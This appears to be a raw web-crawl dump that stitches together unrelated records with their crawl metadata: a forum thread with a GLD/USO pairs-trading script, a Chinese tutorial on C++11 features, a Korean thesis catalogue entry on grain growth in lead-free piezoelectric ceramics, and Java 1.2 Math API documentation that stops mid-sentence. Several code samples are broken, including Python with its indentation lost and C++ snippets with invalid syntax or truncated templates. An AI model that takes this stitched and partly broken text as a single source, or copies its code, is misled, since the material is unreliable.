this:\n\nhttp://epchan.blogspot.co.uk/2011/06/when-cointegration-of-pair-breaks-down.html\n\nI noticed the algo was really unstable with the lookback length. Looking at the chart of the hedge ratio, I can see its very unstable, and yet I would expect the hedge ratio to only change relatively slowly. So, I use an exponential smoothing on the hedge ratio. This seems to help stabilise the performance for a wider range of lookback parameters.\n\n9\nTotal Returns\n--\nAlpha\n--\nBeta\n--\nSharpe\n--\nSortino\n--\nMax Drawdown\n--\nBenchmark Returns\n--\nVolatility\n--\n Returns 1 Month 3 Month 6 Month 12 Month\n Alpha 1 Month 3 Month 6 Month 12 Month\n Beta 1 Month 3 Month 6 Month 12 Month\n Sharpe 1 Month 3 Month 6 Month 12 Month\n Sortino 1 Month 3 Month 6 Month 12 Month\n Volatility 1 Month 3 Month 6 Month 12 Month\n Max Drawdown 1 Month 3 Month 6 Month 12 Month\nimport pandas as pd\nimport numpy as np\nfrom pandas.stats.api import ols\n\ndef initialize(context):\n\n#trading only GLD and USO ETfs\ncontext.securities = symbols('GLD', 'USO')\n\n#pretty arbitrary lookback for moving mean and std of portfolio price\ncontext.lookback = 10\ncontext.hr = 0.10\n\n#to track portfolio price\ncontext.yPort = []\n\n# Rebalance every day, 1 hour after market open.\nschedule_function(my_rebalance, date_rules.every_day(), time_rules.market_open())\n\n# Record tracking variables at the end of each day.\nschedule_function(my_record_vars, date_rules.every_day(), time_rules.market_close())\n\nlb = context.lookback\n\n#ETF recent prices\nx = data.history(symbol('GLD'), 'close', lb, '1d')\ny = data.history(symbol('USO'), 'close', lb, '1d')\n\n#linear regression to get hedge ratio (coffeccient of x)\ndf = pd.DataFrame({'GLD':x, 'USO':y})\n\nres = ols(y=df['USO'], x=df['GLD'])\n\n#smooth the HR so it doesn't change so rapidly\ncontext.hr = context.hr*(1.0-1.0/lb)+res.beta['x']*(1.0/lb)\n\n#price of unit portfolio\nport = y[-1] - context.hr*x[-1]\ncontext.port = port\ncontext.x = x[-1]\ncontext.y = y[-1]\n\n#keep track of portfolio prices\ncontext.yPort.append(port)\n\ncontext.z = 0\n\n#only need previous lookback number of prices\nif len(context.yPort) >= lb:\ncontext.yPort = context.yPort[-lb:]\n\nma = np.mean(context.yPort)\nms = np.std(context.yPort)\n\n#Z-score of current portfolio value\ncontext.z = (port - ma)/ms\n\ndef my_rebalance(context,data):\n\nz = context.z\ny = context.y\nx = context.x\nacc = context.portfolio.portfolio_value\n#order ETFs depending on current hedge ratio and multiplied by Z-score, pumped up by an arbitrary factor\norder_target_value(symbol('GLD'), acc*z/100*context.hr*x)\norder_target_value(symbol('USO'), -acc*z/100*y)\n#order_target_value(symbol('GLD'), 10000*z*context.hr*x)\n#order_target_value(symbol('USO'), -10000*z*y)\n\ndef my_record_vars(context, data):\n#record(leverage = context.account.leverage)\nrecord(hedgeRatio = context.hr)\n#record(port=context.port)\n\n\nThere was a runtime error.\n\nThats very helpful, thanks- yeah, I thought it was strange how much the hedge ratio was fluctuating, I wonder if it is due to having a short lookback period for the linear regression.\n\nThis paper looks good. Updates the hedge ratio using a kalman filter." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56848484,"math_prob":0.81022173,"size":2968,"snap":"2020-34-2020-40","text_gpt3_token_len":752,"char_repetition_ratio":0.1565452,"word_repetition_ratio":0.06763285,"special_character_ratio":0.27156335,"punctuation_ratio":0.14548802,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9843586,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-03T17:36:20Z\",\"WARC-Record-ID\":\"<urn:uuid:a86c356a-d3fc-4d5b-ae59-c20411028aee>\",\"Content-Length\":\"79127\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f16016e9-74fe-48eb-a0f4-57ad3716e760>\",\"WARC-Concurrent-To\":\"<urn:uuid:d6a56301-5b1e-4518-9e74-d90cfa674ff3>\",\"WARC-IP-Address\":\"172.67.8.162\",\"WARC-Target-URI\":\"https://www.quantopian.com/posts/help-for-a-newby-mean-reversion\",\"WARC-Payload-Digest\":\"sha1:FC5DLJQSBLIIOPOCRMSUFGCCENVMSWCZ\",\"WARC-Block-Digest\":\"sha1:PUGMNVYVNBRGSNN4BMHOJQ6EJGDNQQ25\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439735823.29_warc_CC-MAIN-20200803170210-20200803200210-00416.warc.gz\"}"}
https://www.pushvps.com/44199.html
[ "###什么是C++11\n\nC++11是曾经被叫做C++0x,是对目前C++语言的扩展和修正,C++11不仅包含核心语言的新机能,而且扩展了C++的标准程序库**(STL),并入了大部分的C++ Technical Report 1(TR1)**程序库(数学的特殊函数除外)。\n\nC++11包括大量的新特性:包括lambda表达式,类型推导关键字auto、decltype,和模板的大量改进。\n\n###新的关键字\n\n####auto\n\nC++11中引入auto第一种作用是为了自动类型推导\n\nauto的自动类型推导,用于从初始化表达式中推断出变量的数据类型。通过auto的自动类型推导,可以大大简化我们的编程工作\n\nauto实际上实在编译时对变量进行了类型推导,所以不会对程序的运行效率造成不良影响\n\n``````<!-- lang: cpp -->\nauto a; // 错误,auto是通过初始化表达式进行类型推导,如果没有初始化表达式,就无法确定a的类型\nauto i = 1;\nauto d = 1.0;\nauto str = \"Hello World\";\nauto ch = 'A';\nauto func = less<int>();\nvector<int> iv;\nauto ite = iv.begin();\nauto p = new foo() // 对自定义类型进行类型推导\n``````\n\nauto不光有以上的应用,它在模板中也是大显身手,比如下例这个加工产品的例子中,如果不使用auto就必须声明Product这一模板参数:\n\n``````template <typename Product, typename Creator>\nvoid processProduct(const Creator& creator) {\nProduct* val = creator.makeObject();\n// do somthing with val\n}\n.\n``````\n\n``````template <typename Creator>\nvoid processProduct(const Creator& creator) {\nauto val = creator.makeObject();\n// do somthing with val\n}\n``````\n\n####decltype\n\ndecltype实际上有点像auto的反函数,auto可以让你声明一个变量,而decltype则可以从一个变量或表达式中得到类型,有实例如下:\n\n``````int x = 3;\ndecltype(x) y = x;\n``````\n\n``````template <typename Creator>\nauto processProduct(const Creator& creator) -> decltype(creator.makeObject()) {\nauto val = creator.makeObject();\n// do somthing with val\n}\n``````\n\n####nullptr\n\nnullptr是为了解决原来C++中NULL的二义性问题而引进的一种新的类型,因为NULL实际上代表的是0,\n\n``````void F(int a){\ncout<<a<<endl;\n}\n\nvoid F(int *p){\nassert(p != NULL);\n\ncout<< p <<endl;\n}\n\nint main(){\n\nint *p = nullptr;\nint *q = NULL;\nbool equal = ( p == q ); // equal的值为true,说明p和q都是空指针\nint a = nullptr; // 编译失败,nullptr不能转型为int\nF(0); // 在C++98中编译失败,有二义性;在C++11中调用F(int)\nF(nullptr);\n\nreturn 0;\n}\n``````\n\n###序列for循环\n\n``````map<string, int> m{{\"a\", 1}, {\"b\", 2}, {\"c\", 3}};\nfor (auto p : m){\ncout<<p.first<<\" : \"<<p.second<<endl;\n}\n``````\n\n###Lambda表达式\n\nlambda表达式类似Javascript中的闭包,它可以用于创建并定义匿名的函数对象,以简化编程工作。Lambda的语法如下:\n\n[函数对象参数](操作符重载函数参数)->返回值类型{函数体}\n\n``````vector<int> iv{5, 4, 3, 2, 1};\nint a = 2, b = 1;\n\nfor_each(iv.begin(), iv.end(), [b](int &x){cout<<(x + b)<<endl;}); // (1)\n\nfor_each(iv.begin(), iv.end(), [=](int &x){x *= (a + b);});\t\t// (2)\n\nfor_each(iv.begin(), iv.end(), [=](int &x)->int{return x * (a + b);});// (3)\n``````\n• []内的参数指的是Lambda表达式可以取得的全局变量。(1)函数中的b就是指函数可以得到在Lambda表达式外的全局变量,如果在[]中传入=的话,即是可以取得所有的外部变量,如(2)和(3)Lambda表达式\n• ()内的参数是每次调用函数时传入的参数\n• ->后加上的是Lambda表达式返回值的类型,如(3)中返回了一个int类型的变量\n\n###变长参数的模板\n\n``````auto p = make_pair(1, \"C++ 11\");\n``````\n\n``````auto t1 = make_tuple(1, 2.0, \"C++ 11\");\nauto t2 = make_tuple(1, 2.0, \"C++ 11\", {1, 0, 2});\n``````\n\n``````template<typename head, typename... tail>\nPrint(tail...);\n}\n``````\n\nPrint中可以传入多个不同种类的参数,如下:\n\n``````Print(1, 1.0, \"C++11\");\n``````\n\n###更加优雅的初始化方法\n\n``````int arr = {1, 2, 3}\nvector<int> v(arr, arr + 3);\n``````\n\n``````int arr{1, 2, 3};\nvector<int> iv{1, 2, 3};\nmap<int, string>{{1, \"a\"}, {2, \"b\"}};\nstring str{\"Hello World\"};\n``````\n\n###然后呢...\n\nToWrting的C++11系列博文\n\nC++11的编译器支持列表", null, "", null, "" ]
[ null, "https://ae01.alicdn.com/kf/H67bb680a41e24b45a15de1e6cafc29a2y.jpg", null, "https://ae01.alicdn.com/kf/Ha77c54e7b28c488e9a4aea6159695b1av.jpg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7355156,"math_prob":0.9948246,"size":3896,"snap":"2020-34-2020-40","text_gpt3_token_len":2339,"char_repetition_ratio":0.09429599,"word_repetition_ratio":0.09749304,"special_character_ratio":0.31057495,"punctuation_ratio":0.21580547,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97022367,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-07T01:15:01Z\",\"WARC-Record-ID\":\"<urn:uuid:622daf82-6e36-4536-9861-857e796fd62e>\",\"Content-Length\":\"22391\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5536c717-6f45-4094-b7c2-6112ca34ec4d>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad917937-3c56-4789-84c9-5e839c733907>\",\"WARC-IP-Address\":\"104.26.2.99\",\"WARC-Target-URI\":\"https://www.pushvps.com/44199.html\",\"WARC-Payload-Digest\":\"sha1:GQNWZ4MUBT5GQVB3QFD33GE5UT3PGB4B\",\"WARC-Block-Digest\":\"sha1:3RBL4IAFXQHONGVRC6DXSY74XVZEPMAB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737050.56_warc_CC-MAIN-20200807000315-20200807030315-00492.warc.gz\"}"}
http://library.kaist.ac.kr/search/detail/view.do?bibCtrlNo=467748&flag=dissertation
[ "#", null, "", null, "서지주요정보\n70Na${}_{1/2}$Bi${}_{1/2}$TiO${}_{3}$-30BaTiO${}_{3}$ 계에서 Na${}_{2}$O 첨가량에 따른 입자성장거동 = Grain Growth Behavior in 70Na${}_{1/2}$Bi${}_{1/2}$TiO${}_{3}$-30BaTiO${}_{3}$ System with Change of Na${}_{2}$O Addition\n서명 / 저자 70Na${}_{1/2}$Bi${}_{1/2}$TiO${}_{3}$-30BaTiO${}_{3}$ 계에서 Na${}_{2}$O 첨가량에 따른 입자성장거동 = Grain Growth Behavior in 70Na${}_{1/2}$Bi${}_{1/2}$TiO${}_{3}$-30BaTiO${}_{3}$ System with Change of Na${}_{2}$O Addition / 박지훈.\n저자명 박지훈 ; Park, Ji-Hoon\n발행사항 [대전 : 한국과학기술원, 2011].\nOnline Access 원문보기 원문인쇄\n\n등록번호\n\n8022578\n\n소장위치/청구기호\n\n학술문화관(문화관) 보존서고\n\nMAME 11014\n\n도서상태\n\n이용가능\n\n반납예정일\n\n#### 초록정보\n\nRelaxor-based piezoelectric single crystals such as Pb($Zn_{1/3}Nb_{2/3}$)$TiO_3$-$PbTiO_3$ (PZN-PT) and Pb($Mg_{1/3}Nb_{2/3})$TiO_3$-$PbTiO_3$(PMN-PT) are considered as promising for potential applications in medical ultrasonic, sonar transducers and solid state actuators owing to their ultrahigh coupling coefficient as high as 94\\% and piezoelectric coefficient ($d_{33}$) of 2500 pC/N in contrast to conventional Pb(Zr,Ti)$O_3$(PZT) ceramics with$k_{33}$~ 75\\% and$d_{33 }$~ 500 pC/N. However, the toxicity of PbO and its high vapor pressure during sintering has led to a demand for alternative eco-friendly lead-free materials as several countries have already restricted the utility of hazardous substances in electrical and electronic equipments. Therefore, attention has recently been focused on the fabrication of lead-free piezoelectric ceramics and a parallel search for high performance relaxor-based lead-free piezoelectric single crystals. The solid solution 100-$\\textit{x}(Na_{0.5}Bi_{0.5}$)$TiO_{3}$-$\\textit{x}BaTiO_{3}$(NBT-$\\textit{x}$BT) emerged as one the lead-free systems that can replace lead-based pizoelectrics. Over last decade, tremendous efforts have been made to fabricate high quality ceramics and single crystals of NBT-$\\textit{x}$BT, particularly the compositions close to morphotropic phase boundary. In producing NBT-\\textit{x}BT single crystals by melt or solution related techniques such as Bridgeman, Czochralski, top-seeded-solution growth (TSSG), and flux techniques, however, the inhomogeneity problem could not be overcome due to incongruent solidification of the compound and volatilization of low melting-point elements, bismuth and sodium, during crystal growth. To overcome this inherent and critical problem, the solid-state crystal growth (SSCG) technique, which utilizes the frequently observed phenomenon of abnormal grain growth in polycrystals, has been developed. In addition, this technique is much simpler and more cost effective than the conventional techniques. To be successful with the SSCG technique, however, coarsening of fine matrix grains needs to be suppressed during the growth of a seed crystal embedded into the powder compact. Therefore, it is very essential to study the interface morphology and grain growth behaviour of any system before growing the crystal via SSCG. For this present study, a composition ($Na_{0.5}Bi_{0.5}$)$TiO_{3}$-$30BaTiO_{3}$(NBT-30BT) that exhibited relatively strong relaxor behaviour with adequate dielectric permittivity and piezoelectric properties has been considered for the single crystal growth by SSCG technique. Prior to crystal growth, the grain coarsening behaviour of NBT-30BT system has been investigated with varying mol\\% of excess$Na_{2}CO_{3}$. The powders of NBT-30BT, NBT-30BT with 0.2 and 0.5 mol\\%$Na_{2}CO_{3}$(0.2N 30BT, 0.5N 30BT) were prepared by conventional solid state reaction and sintered at different temperatures (1100-1200℃) and durations (10 min-10 h). When the mol\\% of$Na_{2}CO_{3}$increased, the 3-dimensional grain structure changed from rounded to cube shape with more faceted interface and the grain growth behaviour changes toward the abnormal grain growth behaviour. Grain growth behaviour with sintering temperature is explained in terms of the effect of excess$Na_{2}CO_{3}$on interface-reaction controlled grain growth and the critical driving force. The optimal conditions have been figured out and single crystals of 0.2N and 0.5N 30BT with dimension 4 mm x 4 mm x 0.5 mm have been grown using (110)$SrTiO_{3}$seed crystal by SSCG. Pb($Zn_{1/3}Nb_{2/3}$)$TiO_{3}$-$PbTiO_{3}$(PZN-PT), Pb($Mg_{1/3}Nb_{2/3}$)$TiO_{3}$-$PbTiO_{3}$(PMN-PT) 압전단결정은 94\\%의 매우 높은 coupling coefficient와 2500 pC/N에 달하는 압전상수를 갖기 때문에 medical ultrasonic, sonar transducers 그리고 solid state actuators와 같은 소자에 응용이 된다. 하지만, PbO의 독성과 소결시 이 물질의 높은 증기압 때문에 전세계적으로 전자, 전기부품소자를 친환경적인 물질로 대체하고자 하는 추세이다. 그러므로, 최근의 연구는 relaxor-based 비연계압전세라믹스의 제조 및 비연계압전단결정에 집중되고 있다. 고용체인 100-$\\textit{x}(Na_{0.5}Bi_{0.5}$)$TiO_{3}$-$\\textit{x}BaTiO_{3}$(NBT-$\\textit{x}$BT) 연계압전세라믹스를 대체할 물질 중 하나로 떠오르고 있다. 최근 10년동안, MPB조성근처 NBT-BT계의 다결정체 및 단결정에 대한 연구가 이루어졌다. 하지만 Bridgeman, Czochralski, top-seeded-solution growth (TSSG), 그리고 flux techniques을 이용한 NBT-BT계의 단결정성장실험에서의 조성불균일문제가 아직도 해결되지 못했다. 이러한 문제를 해결하기 위해서 다결정체에서의 비정상입자성장을 이용한 고상단결정성장법(SSCG)을 통한 단결정의 성장에 대한 연구가 이루어졌다. SSCG법을 통한 단결정성장을 위해서는 종자단결정이 성장하는 동안 matrix 입자에서의 입자성장이 억제되어야 한다. 따라서, SSCG법을 통해 단결정을 성장시키기에 앞서 다결정체 내에서 입계의 구조 및 입자성장거동을 관찰하는 과정이 필요하다. 본 연구에서는, 상대적으로 강한 relaxor거동을 보이는 ($Na_{0.5}Bi_{0.5}$)$TiO_{3}$-$30BaTiO_{3}$(NBT-30BT)계의 입자성장거동 및 SSCG법을 통한 단결정성장가능성에 대해 연구하였다. 고상단결정성장에 유리한 조건을 찾기 위하여 NBT-30BT 에$Na_{2}CO_{3}$의 양을 0.2~0.5 mol\\%로 변화시켜가며 1100-1200℃ 에서 다양한 시간 동안 입자성장거동을 관찰하였다.$Na_{2}CO_{3}$의 mol\\% 가 증가함에 따라, 3차원 입자모양은 round shape에서 faceted shape으로 변화하였으며, 점점 비정상입자성장거동을 보였다. 이러한 입자성장거동은 첨가된$Na_{2}CO_{3}\\$의 양의 변화에 따른 입자성장의 임계구동력과 최대입자성장구동력과의 관계로 설명할 수 있다.\n\n#### 서지기타정보\n\n청구기호 {MAME 11014 iii, 43 p. : 삽도 ; 26 cm 한국어 저자명의 영문표기 : Ji-Hoon Park 지도교수의 한글표기 : 강석중 지도교수의 영문표기 : Suk-Joong L Kang 학위논문(석사) - 한국과학기술원 : 신소재공학과, 참고문헌 : p. 41-43 비연계 압전특성 입자성장 미세조직 고상단결정성장 Lead-free Piezoelectrics Grain growth Microstructure SSCG\nQR CODE", null, "" ]
[ null, "http://library.kaist.ac.kr/common/images/logo_top.png", null, "http://library.kaist.ac.kr/common/images/bookcover0.jpg", null, "http://chart.googleapis.com/chart", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56618553,"math_prob":0.98051494,"size":4942,"snap":"2019-51-2020-05","text_gpt3_token_len":1930,"char_repetition_ratio":0.11077359,"word_repetition_ratio":0.00295858,"special_character_ratio":0.26325375,"punctuation_ratio":0.08955224,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9808088,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-24T22:45:44Z\",\"WARC-Record-ID\":\"<urn:uuid:23875f3b-bd6b-4660-8d6e-ade5c5b42ded>\",\"Content-Length\":\"102044\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:551126ce-6104-40eb-bf21-884ec25bfe67>\",\"WARC-Concurrent-To\":\"<urn:uuid:2ac89412-d49f-4d41-9484-0729507c1fa0>\",\"WARC-IP-Address\":\"143.248.118.12\",\"WARC-Target-URI\":\"http://library.kaist.ac.kr/search/detail/view.do?bibCtrlNo=467748&flag=dissertation\",\"WARC-Payload-Digest\":\"sha1:VZ2MINPVTKPGWM3ZVEFDVXX33RBPKKM6\",\"WARC-Block-Digest\":\"sha1:6ZYJA5VIGIFKLR64NNVB7K6MEJMLRU2O\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250626449.79_warc_CC-MAIN-20200124221147-20200125010147-00038.warc.gz\"}"}
https://courses.cs.washington.edu/courses/cse341/98au/java/jdk1.2beta4/docs/api/java/lang/Math.html
[ "Java Platform 1.2\nBeta 4\n\n## Class java.lang.Math\n\n```java.lang.Object\n|\n+--java.lang.Math\n```\n\npublic final class Math\nextends Object\nThe class `Math` contains methods for performing basic numeric operations such as the elementary exponential, logarithm, square root, and trigonometric functions.\n\nTo help ensure portability of Java programs, the definitions of many of the numeric functions in this package require that they produce the same results as certain published algorithms. These algorithms are available from the well-known network library `netlib` as the package \"Freely Distributable Math Library\" (`fdlibm`). These algorithms, which are written in the C programming language, are then to be understood as executed with all floating-point operations following the rules of Java floating-point arithmetic.\n\nThe network library may be found on the World Wide Web at:\n\n``` http://netlib.att.com/\n```\n\nthen perform a keyword search for \"`fdlibm`\".\n\nThe Java math library is defined with respect to the version of `fdlibm` dated January 4, 1995. Where `fdlibm` provides more than one definition for a function (such as `acos`), use the \"IEEE 754 core function\" version (residing in a file whose name begins with the letter `e`).\n\nSince:\nJDK1.0\n\n Field Summary static double E           The `double` value that is closer than any other to `e`, the base of the natural logarithms. static double PI           The `double` value that is closer than any other to pi, the ratio of the circumference of a circle to its diameter.\n\n Method Summary static double abs(double a)           Returns the absolute value of a `double` value. static float abs(float a)           Returns the absolute value of a `float` value. static int abs(int a)           Returns the absolute value of an `int` value. static long abs(long a)           Returns the absolute value of a `long` value. static double acos(double a)           Returns the arc cosine of an angle, in the range of 0.0 through pi. static double asin(double a)           Returns the arc sine of an angle, in the range of -pi/2 through pi/2. static double atan(double a)           Returns the arc tangent of an angle, in the range of -pi/2 through pi/2. static double atan2(double a, double b)           Converts rectangular coordinates (`b`, `a`) to polar (r, theta). static double ceil(double a)           Returns the smallest (closest to negative infinity) `double` value that is not less than the argument and is equal to a mathematical integer. static double cos(double a)           Returns the trigonometric cosine of an angle. static double exp(double a)           Returns the exponential number e (i.e. static double floor(double a)           Returns the largest (closest to positive infinity) `double` value that is not greater than the argument and is equal to a mathematical integer. static double IEEEremainder(double f1, double f2)           Computes the remainder operation on two arguments as prescribed by the IEEE 754 standard. static double log(double a)           Returns the natural logarithm (base e) of a `double` value. static double max(double a, double b)           Returns the greater of two `double` values. static float max(float a, float b)           Returns the greater of two `float` values. static int max(int a, int b)           Returns the greater of two `int` values. static long max(long a, long b)           Returns the greater of two `long` values. static double min(double a, double b)           Returns the smaller of two `double` values. static float min(float a, float b)           Returns the smaller of two `float` values. static int min(int a, int b)           Returns the smaller of two `int` values. static long min(long a, long b)           Returns the smaller of two `long` values. static double pow(double a, double b)           Returns of value of the first argument raised to the power of the second argument. static double random()           Returns a random number between `0.0` and `1.0`. static double rint(double a)           returns the closest integer to the argument. static long round(double a)           Returns the closest `long` to the argument. static int round(float a)           Returns the closest `int` to the argument. static double sin(double a)           Returns the trigonometric sine of an angle. static double sqrt(double a)           Returns the square root of a `double` value. static double tan(double a)           Returns the trigonometric tangent of an angle. static double toDegrees(double angrad)           Converts an angle measured in radians to the equivalent angle measured in degrees. static double toRadians(double angdeg)           Converts an angle measured in degrees to the equivalent angle measured in radians.\n\n Methods inherited from class java.lang.Object clone , equals , finalize , getClass , hashCode , notify , notifyAll , toString , wait , wait , wait\n\n Field Detail\n\n### E\n\n`public static final double E`\nThe `double` value that is closer than any other to `e`, the base of the natural logarithms.\n\n### PI\n\n`public static final double PI`\nThe `double` value that is closer than any other to pi, the ratio of the circumference of a circle to its diameter.\n Method Detail\n\n### sin\n\n`public static double sin(double a)`\nReturns the trigonometric sine of an angle.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe sine of the argument.\n\n### cos\n\n`public static double cos(double a)`\nReturns the trigonometric cosine of an angle.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe cosine of the argument.\n\n### tan\n\n`public static double tan(double a)`\nReturns the trigonometric tangent of an angle.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe tangent of the argument.\n\n### asin\n\n`public static double asin(double a)`\nReturns the arc sine of an angle, in the range of -pi/2 through pi/2.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe arc sine of the argument.\n\n### acos\n\n`public static double acos(double a)`\nReturns the arc cosine of an angle, in the range of 0.0 through pi.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe arc cosine of the argument.\n\n### atan\n\n`public static double atan(double a)`\nReturns the arc tangent of an angle, in the range of -pi/2 through pi/2.\nParameters:\n``` a``` - an angle, in radians.\nReturns:\nthe arc tangent of the argument.\n\n`public static double toRadians(double angdeg)`\nConverts an angle measured in degrees to the equivalent angle measured in radians.\nParameters:\n``` angdeg``` - an angle, in degrees\nReturns:\nthe measurement of the angle `angdeg` in radians.\nSince:\nJDK1.2\n\n### toDegrees\n\n`public static double toDegrees(double angrad)`\nConverts an angle measured in radians to the equivalent angle measured in degrees.\nParameters:\n``` angrad``` - an angle, in radians\nReturns:\nthe measurement of the angle `angrad` in degrees.\nSince:\nJDK1.2\n\n### exp\n\n`public static double exp(double a)`\nReturns the exponential number e (i.e., 2.718...) raised to the power of a `double` value.\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe value ea, where e is the base of the natural logarithms.\n\n### log\n\n`public static double log(double a)`\nReturns the natural logarithm (base e) of a `double` value.\nParameters:\n``` a``` - a number greater than `0.0`.\nReturns:\nthe value ln `a`, the natural logarithm of `a`.\n\n### sqrt\n\n`public static double sqrt(double a)`\nReturns the square root of a `double` value.\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe square root of `a`. If the argument is NaN or less than zero, the result is NaN.\n\n### IEEEremainder\n\n```public static double IEEEremainder(double f1,\ndouble f2)```\nComputes the remainder operation on two arguments as prescribed by the IEEE 754 standard. The remainder value is mathematically equal to `f1 - f2` × n, where n is the mathematical integer closest to the exact mathematical value of the quotient `f1/f2`, and if two mathematical integers are equally close to `f1/f2`, then n is the integer that is even. If the remainder is zero, its sign is the same as the sign of the first argument.\nParameters:\n``` f1``` - the dividend.\n``` f2``` - the divisor.\nReturns:\nthe remainder when `f1` is divided by `f2`.\n\n### ceil\n\n`public static double ceil(double a)`\nReturns the smallest (closest to negative infinity) `double` value that is not less than the argument and is equal to a mathematical integer.\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe smallest (closest to negative infinity) `double` value that is not less than the argument and is equal to a mathematical integer.\n\n### floor\n\n`public static double floor(double a)`\nReturns the largest (closest to positive infinity) `double` value that is not greater than the argument and is equal to a mathematical integer.\nParameters:\n``` a``` - a `double` value.\n``` a``` - an assigned value.\nReturns:\nthe largest (closest to positive infinity) `double` value that is not greater than the argument and is equal to a mathematical integer.\n\n### rint\n\n`public static double rint(double a)`\nreturns the closest integer to the argument.\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe closest `double` value to `a` that is equal to a mathematical integer. If two `double` values that are mathematical integers are equally close to the value of the argument, the result is the integer value that is even.\n\n### atan2\n\n```public static double atan2(double a,\ndouble b)```\nConverts rectangular coordinates (`b``a`) to polar (r, theta). This method computes the phase theta by computing an arc tangent of `a/b` in the range of -pi to pi.\nParameters:\n``` a``` - a `double` value.\n``` b``` - a `double` value.\nReturns:\nthe theta component of the point (rtheta) in polar coordinates that corresponds to the point (ba) in Cartesian coordinates.\n\n### pow\n\n```public static double pow(double a,\ndouble b)```\nReturns of value of the first argument raised to the power of the second argument.\n\nIf (`a == 0.0`), then `b` must be greater than `0.0`; otherwise an exception is thrown. An exception also will occur if (`a <= 0.0`) and `b` is not equal to a whole number.\n\nParameters:\n``` a``` - a `double` value.\n``` b``` - a `double` value.\nReturns:\nthe value `ab`.\nThrows:\nArithmeticException - if (`a == 0.0`) and (`b <= 0.0`), or if (`a <= 0.0`) and `b` is not equal to a whole number.\n\n### round\n\n`public static int round(float a)`\nReturns the closest `int` to the argument.\n\nIf the argument is negative infinity or any value less than or equal to the value of `Integer.MIN_VALUE`, the result is equal to the value of `Integer.MIN_VALUE`.\n\nIf the argument is positive infinity or any value greater than or equal to the value of `Integer.MAX_VALUE`, the result is equal to the value of `Integer.MAX_VALUE`.\n\nParameters:\n``` a``` - a `float` value.\nReturns:\nthe value of the argument rounded to the nearest `int` value.\n`Integer.MAX_VALUE`, `Integer.MIN_VALUE`\n\n### round\n\n`public static long round(double a)`\nReturns the closest `long` to the argument.\n\nIf the argument is negative infinity or any value less than or equal to the value of `Long.MIN_VALUE`, the result is equal to the value of `Long.MIN_VALUE`.\n\nIf the argument is positive infinity or any value greater than or equal to the value of `Long.MAX_VALUE`, the result is equal to the value of `Long.MAX_VALUE`.\n\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe value of the argument rounded to the nearest `long` value.\n`Long.MAX_VALUE`, `Long.MIN_VALUE`\n\n### random\n\n`public static double random()`\nReturns a random number between `0.0` and `1.0`. Random number generators are often referred to as pseudorandom number generators because the numbers produced tend to repeat themselves after a period of time.\nReturns:\na pseudorandom `double` between `0.0` and `1.0`.\n`Random.nextDouble()`\n\n### abs\n\n`public static int abs(int a)`\nReturns the absolute value of an `int` value. If the argument is not negative, the argument is returned. If the argument is negative, the negation of the argument is returned.\n\nNote that if the argument is equal to the value of `Integer.MIN_VALUE`, the most negative representable `int` value, the result is that same value, which is negative.\n\nParameters:\n``` a``` - an `int` value.\nReturns:\nthe absolute value of the argument.\n`Integer.MIN_VALUE`\n\n### abs\n\n`public static long abs(long a)`\nReturns the absolute value of a `long` value. If the argument is not negative, the argument is returned. If the argument is negative, the negation of the argument is returned.\n\nNote that if the argument is equal to the value of `Long.MIN_VALUE`, the most negative representable `long` value, the result is that same value, which is negative.\n\nParameters:\n``` a``` - a `long` value.\nReturns:\nthe absolute value of the argument.\n`Long.MIN_VALUE`\n\n### abs\n\n`public static float abs(float a)`\nReturns the absolute value of a `float` value. If the argument is not negative, the argument is returned. If the argument is negative, the negation of the argument is returned.\nParameters:\n``` a``` - a `float` value.\nReturns:\nthe absolute value of the argument.\n\n### abs\n\n`public static double abs(double a)`\nReturns the absolute value of a `double` value. If the argument is not negative, the argument is returned. If the argument is negative, the negation of the argument is returned.\nParameters:\n``` a``` - a `double` value.\nReturns:\nthe absolute value of the argument.\n\n### max\n\n```public static int max(int a,\nint b)```\nReturns the greater of two `int` values.\nParameters:\n``` a``` - an `int` value.\n``` b``` - an `int` value.\nReturns:\nthe larger of `a` and `b`.\n\n### max\n\n```public static long max(long a,\nlong b)```\nReturns the greater of two `long` values.\nParameters:\n``` a``` - a `long` value.\n``` b``` - a `long` value.\nReturns:\nthe larger of `a` and `b`.\n\n### max\n\n```public static float max(float a,\nfloat b)```\nReturns the greater of two `float` values. If either value is `NaN`, then the result is `NaN`. Unlike the the numerical comparison operators, this method considers negative zero to be strictly 